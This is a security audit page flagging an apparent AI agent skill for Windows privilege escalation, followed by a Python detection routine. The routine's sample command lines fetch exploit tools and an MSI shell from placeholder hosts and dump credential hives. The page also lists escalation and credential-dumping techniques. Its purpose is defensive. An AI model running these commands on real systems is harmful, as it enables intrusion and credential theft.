windows-privilege-escalation
Warn
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: MEDIUM
Tags: COMMAND_EXECUTION, CREDENTIALS_UNSAFE, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous commands intended to escalate privileges by modifying system settings. Examples include reconfiguring service binary paths (sc config), creating high-privilege scheduled tasks (Register-ScheduledTask), and performing registry hijacks to execute arbitrary code.
- [CREDENTIALS_UNSAFE]: The playbook details methods for accessing and extracting highly sensitive system credentials. This includes instructions for dumping the local registry hives (SAM, SYSTEM, SECURITY) for offline password extraction and techniques for enumerating stored credentials with cmdkey.
- [EXTERNAL_DOWNLOADS]: The skill references and links to a wide range of third-party exploit tools and security-focused GitHub repositories. It explicitly mentions the "Potato" exploit family (JuicyPotato, GodPotato), enumeration tools (winPEAS, PowerUp), and the UACME project for bypassing security controls.
- [REMOTE_CODE_EXECUTION]: The instructions include methods for executing external payloads, such as using cmstp.exe to execute remote scriptlets, or generating and running malicious MSI files via msiexec to obtain reverse shells.
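As an added example that is not part of this audit or of the audited skill, the routine below tags process command lines with the same four categories the audit uses, matching the indicators it names: sc config with binPath=, Register-ScheduledTask with -RunLevel Highest, reg save of the SAM/SYSTEM/SECURITY hives, cmdkey /list, the named Potato/winPEAS/PowerUp/UACME tools, cmstp with /ni /s, and msiexec installing from a remote location. The sample command lines are constructed, the 203.0.113.x addresses are documentation-range placeholders, and the rules are one defender's assumed encoding of the indicators, not the trust hub's own scoring logic.

```python
import re

# Constructed sample process-creation command lines (Sysmon Event ID 1 style).
# They are not taken from the audited skill or any real incident.
SAMPLE_COMMAND_LINES = [
    r'sc config Spooler binPath= "C:\Users\Public\evil.exe"',
    r'powershell -c "Register-ScheduledTask -TaskName Upd -Action $a -RunLevel Highest"',
    r'reg save HKLM\SAM C:\Windows\Temp\sam.hiv',
    r'reg save HKLM\SYSTEM C:\Windows\Temp\system.hiv',
    r'cmdkey /list',
    r'cmstp.exe /ni /s C:\Windows\Temp\payload.inf',
    r'msiexec /q /i http://203.0.113.10/shell.msi',
    r'powershell -c "iwr http://203.0.113.10/JuicyPotato.exe -OutFile jp.exe"',
    r'notepad.exe C:\Users\alice\notes.txt',
]

# Assumed detection rules: (category from the audit, regex over the command line).
RULES = [
    # Service binary path rewrite via sc config ... binPath=
    ("COMMAND_EXECUTION", re.compile(r"\bsc(?:\.exe)?\s+config\b.*\bbinPath=", re.I)),
    # Scheduled task registered to run with highest privileges
    ("COMMAND_EXECUTION", re.compile(r"Register-ScheduledTask\b.*-RunLevel\s+Highest", re.I)),
    # Offline hive dump of SAM / SYSTEM / SECURITY
    ("CREDENTIALS_UNSAFE", re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SAM|SYSTEM|SECURITY)\b", re.I)),
    # Enumeration of stored credentials
    ("CREDENTIALS_UNSAFE", re.compile(r"\bcmdkey(?:\.exe)?\s+/list\b", re.I)),
    # Tool names the audit lists, appearing anywhere on the command line
    ("EXTERNAL_DOWNLOADS", re.compile(r"\b(?:JuicyPotato|GodPotato|winPEAS|PowerUp|UACME)\b", re.I)),
    # Common download primitives (assumed; not named on the audit page)
    ("EXTERNAL_DOWNLOADS", re.compile(r"\b(?:Invoke-WebRequest|iwr|Start-BitsTransfer|certutil\b.*-urlcache)\b", re.I)),
    # cmstp executing an INF with the silent / no-install switches
    ("REMOTE_CODE_EXECUTION", re.compile(r"\bcmstp(?:\.exe)?\b.*\s/(?:ni|s)\b", re.I)),
    # msiexec installing a package from an HTTP or UNC location
    ("REMOTE_CODE_EXECUTION", re.compile(r"\bmsiexec(?:\.exe)?\b.*\s/i\s+(?:https?://|\\\\)", re.I)),
]


def classify(cmdline: str) -> set:
    """Return the set of audit categories whose rules match one command line."""
    return {category for category, pattern in RULES if pattern.search(cmdline)}


def triage(cmdlines) -> dict:
    """Group command lines by the categories they trigger; unmatched lines are dropped."""
    hits = {}
    for line in cmdlines:
        for category in classify(line):
            hits.setdefault(category, []).append(line)
    return hits


if __name__ == "__main__":
    for category, lines in sorted(triage(SAMPLE_COMMAND_LINES).items()):
        print(category)
        for line in lines:
            print("   ", line)
```

Matching on command-line text is a triage signal only: renamed binaries, split arguments, or obfuscated PowerShell defeat these patterns, so the durable controls are telemetry on service configuration changes, scheduled-task registration, and hive access rather than the strings above.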
Audit Metadata